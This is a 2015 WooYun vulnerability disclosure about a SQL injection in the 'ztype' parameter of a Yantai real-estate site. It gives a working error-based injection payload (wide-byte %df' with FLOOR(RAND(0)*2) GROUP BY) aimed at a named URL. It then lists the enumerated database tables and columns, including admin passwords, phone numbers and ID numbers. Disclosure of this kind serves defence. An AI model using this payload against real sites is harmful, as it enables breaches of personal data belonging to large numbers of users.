当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0142779

漏洞标题:烟台房地产网某站注入漏洞可导致100W账号信息泄漏+55W租房房源信息

相关厂商:烟台房地产网

漏洞作者: 渔村安全实验室

提交时间:2015-09-22 14:40

修复时间:2015-11-06 14:42

公开时间:2015-11-06 14:42

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-22: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-11-06: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

烟台房地产网某站注入漏洞可导致100W账号信息泄漏+55W租房房源信息

详细说明:

http://zt.ythouse.com/more.php?ztype=15


ztype参数存在注入

payload:
http://zt.ythouse.com/more.php?ztype=15%df' and 1=(SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x217e,database(),0x7e21,user(),0x217e,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)--+a


QQ截图20150916185854.png


db_num:14       db_table:1551   db_data:113872758


泄漏的账号信息累计约110W

QQ截图20150922142856.png


QQ截图20150922142943.png


约55W条租房信息

QQ截图20150922143047.png


还有5W多条有购房意向客户的相信信息

QQ截图20150922143306.png


部分表项信息

ythouse20150715
edi_love
count:15648
edi_id
edi_class
edi_images
edi_head
edi_sign
edi_tel
edi_lr
edi_date
edi_cs
edi_love_1
count:14
edi_id
edi_class
edi_images
edi_head
edi_sign
edi_tel
edi_lr
edi_date
edi_cs
edi_marry
count:4
tid
tnum
dateline
edi_marry_user
count:727
id
thing
code
dateline
edi_xiwang
count:5
tid
tnum
dateline
edi_xiwang_user
count:120
id
thing
code
dateline
housefloor_list
count:352
sid
id
modoer_a_tels
count:99887
id
tels
modoer_activity
count:1798
aid
uid
username
year
month
reviews
fristreviews
flowers
addshops
modoer_admin
count:50
id
adminname
password
email
admintype
is_founder
logintime
loginip
logincount
modoer_admin_kanfangtuan
count:78
id
shopname
shopid
note
dateline
type
listorder
area
ckprice
youhui
modoer_admin_kanfangtuan_pic
count:6
id
detail_url
pic_url
title
dateline
note
modoer_admin_log
count:66533
id
username
content
ip
dateline
modoer_admin_work
count:6
openid
dateline
areacode
type
id
keyword
modoer_adminsessions
count:3
adminid
ip
dateline
errorcount
modoer_ads
count:3
adid
callid
subject
adtype
begintime
endtime
content
code
isclosed
attr
modoer_announcements
count:0
id
title
orders
content
author
pageview
dateline
available
modoer_areacode
count:15
aid
areaname
default_mappoint
areacode
areasort
modoer_articleclass
count:1
classid
classname
displayorder
articlenum
modoer_articledata
count:0
articleid
content
modoer_articles
count:0
articleid
classid
shopid
dateline
att
uid
author
subject
keywords
pageview
digg
copyfrom
introduce
status
checker
modoer_bcastr
count:1
bcastr_id
available
itemtitle
link
item_url
orders
modoer_book
count:43
id
username
header
message
ip
dateline
modoer_cardapply
count:0
applyid
uid
username
linkman
tel
mobile
address
postcode
num
coin
dateline
status
comment
checker
checktime
checkmsg
modoer_carddiscounts
count:0
shopid
cardsort
discount
largess
exception
addtime
available
finer
modoer_classcode
count:13
cid
classname
classcode
classsort
total
config
classorder
modoer_config
count:62
variable
value
modoer_consensus
count:4
id
caption
style
editor
note
datetime
edittime
status
remark
file_address
qikan_time
modoer_coupons
count:0
couponid
shopid
uid
username
thumb
picture
starttime
endtime
subject
des
content
effect1
flag
dateline
pageview
modoer_datacall
count:55
callid
module
calltype
name
fun
var
expression
tplname
empty_tplname
closed
hash
modoer_dingyue
count:1
id
tel
email
status
updatetime
loupan_sid
name
area_code
modoer_district_List_
count:973
did
name
address
areaid
buessiness
saletype
rname
modoer_district_buessiness
count:42
id
aid
areaid
buessiness
posts
searchnum
modoer_district_list
count:972
did
name
address
areaid
aid
buessiness
saletype
rname
point_x
point_y
bus
modoer_exchange
count:0
exchangeid
uid
giftid
giftname
price
number
status
status_extra
exchangetime
contact
checker
modoer_favorites
count:13
fid
uid
shopid
addtime
modoer_flowers
count:248
fid
reviewid
uid
username
modoer_friends
count:0
fid
uid
fuid
fusername
addtime
modoer_gbooks
count:0
gid
uid
gbuid
gbusername
content
posttime
modoer_getpassword
count:0
getpwid
uid
secode
posttime
status
modoer_gifts
count:0
giftid
name
available
displayorder
description
price
num
thumb
picture
salevolume
modoer_groupbuy
count:18389
id
see_house
give_book
give_tel
gb_name
gb_tel
gb_mobi
gb_email
gb_cardno
gb_profession
gb_mianji
gb_yusuan
select_region
floor_region
shopid
housefloor_name
floor_type
floor_type0
floor_price
buy_time
gb_content
updatetime
add_time
gb_ip
if_show
cbl_bookhouse
gb_age
gb_sex
gb_officephone
gb_postalcode
gb_address
gb_quyu
modoer_guestbook
count:1
guestbookid
id
idtype
username
uid
dateline
content
reply
replytime
modoer_history_price
count:15030
id
sid
heightprice
lowprice
averageprice
happentime
addtime
price_shenhe
remarks
modoer_house
count:1365844
id
htid
htype
puttype
realname
sex
tel
cityareaid
purpose
estatename
zlfangshi
zdzuqi
payway
jianzhuyear
ruzhutime
bus
tag
address
room
hall
toilet
veranda
price
price_s
pricecont
pricecont1
timearea
validity
area_s
usablearea
totalfloor
isfloor
position
position1
faceto
fitment
supporting
content
uid
username
postdate
updatetime
realip
editip
pageviews
reviews
uptop
lastuptime
fwqk
finishtime
chanquan
fangchanzheng
fukuan
tudizheng
mqzk
hzsex
education
issmoke
isdrink
map_x
map_y
pswd
pic_num
exposing
finer
state
modoer_house_advice
count:2375
id
advice
ip
postime
modoer_house_auto_est
count:517
aid
shopid
shopname
road
village
buliding
address
modoer_house_cache
count:9043
id
htype
cityareaid
price_s
area_s
room
hall
puttype
count
cachetime
modoer_house_cityarea
count:14
id
name
modoer_house_estate
count:3283
id
name
cityareaid
modoer_house_exposing
count:36
id
hid
type
content
onlineip
dateline
modoer_house_exposing_0928
count:10548
id
hid
type
content
onlineip
dateline
modoer_house_ip
count:3598
ip
hid
ikey
itel
dateline
itype
modoer_house_pictures
count:345951
pid
uid
username
hid
title
desc
folder
filename
width
height
size
comments
sort
browse
tags
addtime
status
modoer_house_reviews
count:88109
rid
hid
uid
username
message
messagetxt
floornum
firstrid
uprid
sendtime
sendip
support
against
state
modoer_house_search_key
count:10306
id
searchkey
num
count
lastuptime
modoer_house_spam_tel
count:1919
id
tel
content
dateline
tnum
state
modoer_house_spam_tel_
count:16784
id
tel
content
dateline
tnum
state
modoer_house_supporting
count:16
id
name
type
modoer_house_tel
count:9
id
tel
tyear
tmonth
dateline
texposing
tnum
state
modoer_house_zj
count:556589
id
htype
puttype
realname
sex
tel
cityareaid
purpose
estatename
zlfangshi
zdzuqi
payway
jianzhuyear
ruzhutime
bus
tag
address
room
hall
toilet
veranda
price
price_s
pricecont
pricecont1
timearea
validity
area_s
usablearea
totalfloor
isfloor
position
position1
faceto
fitment
supporting
content
uid
username
bid
sid
postdate
updatetime
realip
editip
pageviews
reviews
uptop
lastuptime
fwqk
finishtime
chanquan
fangchanzheng
fukuan
tudizheng
mqzk
hzsex
education
issmoke
isdrink
map_x
map_y
pswd
pic_num
thumb
exposing
finer
bfiner
ufiner
state
modoer_house_zj_branch
count:294
bid
bname
bphone
baddress
bopentxt
bservicetxt
busernumber
bopentime
bmail
bcom
bprofile
regdate
bmasteruid
bmaster
sid
modoer_house_zj_cache
count:6705
id
htype
cityareaid
price_s
area_s
room
hall
puttype
count
cachetime
modoer_house_zj_log
count:76240
id
bid
zid
zuid
hid
zusername
message
addtime
modoer_house_zj_pictures
count:18746
pid
uid
username
hid
title
folder
filename
width
height
size
comments
sort
browse
tags
addtime
status
modoer_house_zj_reviews
count:887
rid
hid
username
message
messagetxt
floornum
firstrid
uprid
sendtime
sendip
support
against
state
modoer_house_zj_store
count:23
sid
sname
stitle
sprofile
ssite
sstate
ssort
modoer_house_zj_user
count:2462
uid
sid
bid
uname
upswd
uphone
uservice
upoint
uaddress
uphoto
umail
uqq
uviews
uregdate
ulastdate
uloginum
unotes
uprofile
adminid
ustate
modoer_house_zj_user1006
count:1315
uid
sid
bid
uname
upswd
uphone
uservice
upoint
uaddress
uphoto
umail
uqq
uviews
uregdate
ulastdate
uloginum
unotes
uprofile
adminid
modoer_house_zsckcom
count:37
zsid
zsidnum
zsname
zspassword
zsmingcheng
zsphone
zsaddress
zsmail
zshomepage
zsname2
zsfontcolor
zsflag
bigclass
message
zsorder
modoer_house_zscklog
count:745
id
zsid
username
logtype
ip
errorpw
dateline
modoer_house_zsckuser
count:916
id
xiaoqu
huxing
mj
ceng1
ceng2
cl
jgtime
ys
zname
tel
qqmsn
address
content
company
jftime
kztime
dateline
modoer_important_person
count:1
id
name
id_num
tel
address
qq
base
note
status
modoer_index_db
count:103
mid
mname
content
dbtype
dateline
modoer_index_db_bak
count:33
mid
mname
content
dateline
modoer_index_images
count:32
id
title
switch
url
imgurl
dateline

漏洞证明:

修复方案:

你比我懂

版权声明:转载请注明来源 渔村安全实验室@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝


漏洞评价:

评论